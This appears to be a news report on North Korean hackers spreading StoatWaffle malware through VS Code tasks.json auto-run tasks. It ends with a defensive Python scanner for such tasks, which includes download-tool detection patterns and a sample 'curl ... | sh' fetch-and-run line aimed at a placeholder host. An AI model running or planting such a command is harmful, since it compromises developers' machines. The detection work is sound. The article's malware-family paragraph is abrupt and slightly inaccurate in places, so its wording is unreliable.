The North Korean hackers behind the Contagious Interview campaign, also known as WaterPlum, have been linked to a malware family called StoatWaffle that is spread through malicious Microsoft Visual Studio Code (VS Code) projects. Since December 2025, the threat actor has been using VS Code "tasks.json" to spread malware.

The attacks use the "runOn: folderOpen" option to make the malware run automatically every time a file in the project folder is opened in VS Code. NTT Security said in a report last week that "This task is set up so that it downloads data from a web application on Vercel no matter what operating system it is running on."

"We're assuming that the operating system that runs the program is Windows, but the basic behaviors are the same for any OS." The downloaded payload first checks whether Node.js is already installed in the environment where it is running. If it isn't there, the malware downloads and installs Node.js from the official website.

InvisibleFerret is usually delivered through BeaverTail, but recent attacks have shown that it can also be sent as a follow-up payload after initial access is gained through OtterCookie. FlexibleFerret is also known as WeaselStore. GolangGhost and PylangGhost are the names of its Go and Python versions, respectively.

Newer versions of the VS Code projects have moved away from Vercel-based domains in favor of GitHub Gist-hosted scripts that download and run next-stage payloads, eventually leading to the deployment of FlexibleFerret. This shows that the threat actors are still improving their skills. The VS Code projects themselves are staged on GitHub.
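
A defensive check for the auto-run task described above, added here as an example and not taken from the NTT Security report: it parses a workspace's `.vscode/tasks.json` (comments and trailing commas included) and lists every task whose `runOptions.runOn` is `folderOpen`, rating those whose command fetches from the network as high. The fetch patterns, the function names and the sample file are constructed assumptions.

```python
import json, re, sys
from pathlib import Path

# Match JSON strings first so "//" inside a URL is not mistaken for a comment.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)
# Assumed heuristic: common download tools plus the hosting named in the article.
_FETCH = re.compile(r'\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin)\b'
                    r'|https?://|vercel\.app|gist\.github', re.I)

def load_jsonc(text):
    """Parse tasks.json, which VS Code lets carry comments and trailing commas."""
    text = _JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else '', text)
    return json.loads(re.sub(r',(\s*[}\]])', r'\1', text))

def command_strings(task):
    """Yield the command line of a task, including per-OS overrides."""
    for scope in (task, *(task.get(k, {}) for k in ("windows", "osx", "linux"))):
        parts = [scope.get("command", "")] + list(scope.get("args", []))
        line = " ".join(p if isinstance(p, str) else p.get("value", "") for p in parts)
        if line.strip():
            yield line

def audit_tasks(text):
    """Return (label, severity, command) for each task that runs on folder open."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        for cmd in command_strings(task):
            sev = "high" if _FETCH.search(cmd) else "review"
            findings.append((task.get("label", "<unnamed>"), sev, cmd))
    return findings

# Constructed sample; example.invalid is a placeholder host, not an indicator.
SAMPLE = '''{
  // looks like a build helper
  "version": "2.0.0",
  "tasks": [
    {"label": "env", "type": "shell",
     "command": "curl -s https://example.invalid/api | sh",
     "windows": {"command": "curl -s https://example.invalid/api | cmd"},
     "runOptions": {"runOn": "folderOpen"},},
    {"label": "lint", "type": "shell", "command": "npm run lint"}
  ]
}'''

if __name__ == "__main__":  # usage: python audit_tasks.py <repo-dir> ...
    for path in (p for r in sys.argv[1:] for p in Path(r).rglob(".vscode/tasks.json")):
        for label, sev, cmd in audit_tasks(path.read_text(errors="replace")):
            print(path, label, sev, cmd, sep="\t")
```

Run it over a cloned repository before opening the folder in VS Code; a "review" result still means a command will start without a click once the workspace is trusted.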